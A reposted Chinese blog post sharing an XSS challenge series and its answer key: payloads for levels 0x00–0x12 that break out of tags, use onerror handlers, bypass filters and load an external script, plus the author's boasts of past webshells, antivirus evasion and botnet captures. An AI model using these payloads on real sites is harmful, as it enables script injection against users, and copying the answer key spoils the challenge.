【19道XSS题目】不服来战!(转)
【19道XSS题目】不服来战!
记得第一次接触xss这个概念是在高中,那个时候和一个好基友通过黑客X档案和黑客手册。第一次接触到了除了游戏以外的电脑知识,然后知道了,原来电脑除了玩游戏还可以搞这些,从此两人一发不可收拾的爱上了玩黑这方面的东西。
现在想起来,高中时期是在08年左右,那个时候的网络安全环境还蛮差。那个时候没什么计算机知识,跟着杂志直接用工具跑都拿到了蛮多的webshell,后来学的多了,自己会写一些壳过免杀,艳照门时候抓的肉鸡那就不要说了,嘿嘿!
XSS具体的概念就不在这解释了,做前端的童鞋们只要是稍微对安全这方面有过一点了解的,应该都是知道的。
这里有19道XSS的题目,网址是神通广大的“QQ群爸爸”给的。大家如果想加深对XSS这方面的了解,可以来挑战一下。看看能过几关斩几将!
挑战请搓下面网址:
答案在下面给到,主要的思路大概是以下几种:
1.layload外部js
2.绕过正则
3.闭合标签
4.转化编码:10HEX,16HEX etc.
5.创建错误执行Js
--------------------------------------------------- 我是分割线 答案在下面 ---------------------------------------------------------------------
0x00:<script>alert(1)</script>
0x01:</textarea><script>alert(1)</script>
0x02:"><script>alert(1)</script>
0x03:<img src="" onerror=javascript:alert(1)>
0x04:<img src="" onerror=javascript:alert(1)>
0x05:--!><script>alert(1)</script>
0x06:type="image" src="xxx" onerror
="alert(1)"
0x07:<body onload=alert(1) CRLF结尾
0x08:</style /><script>alert(1)</script>
0x09:https://www.segmentfault.com.haozi.me/j.js
0x0A:https://www.segmentfault.com.haozi.me/j.js
0x0B:<script src="https://www.segmentfault.com.haozi.me/j.js"></script>
0x0C:<scripscriptt src="https://www.segmentfault.com.haozi.me/j.js"></scripscriptt>
0x0D:
alert(1);
-->
0x0E:<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>
0x0F:');alert('1
0x10:eval("alert(1)");
0x11:"),alert("1
0x12:
</script>
<script>
alert(1);
</script>
<script>
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 地球OL攻略 —— 某应届生求职总结
· 提示词工程——AI应用必不可少的技术
· Open-Sora 2.0 重磅开源!
· 周边上新:园子的第一款马克杯温暖上架
2015-05-18 转载 r.js打包经验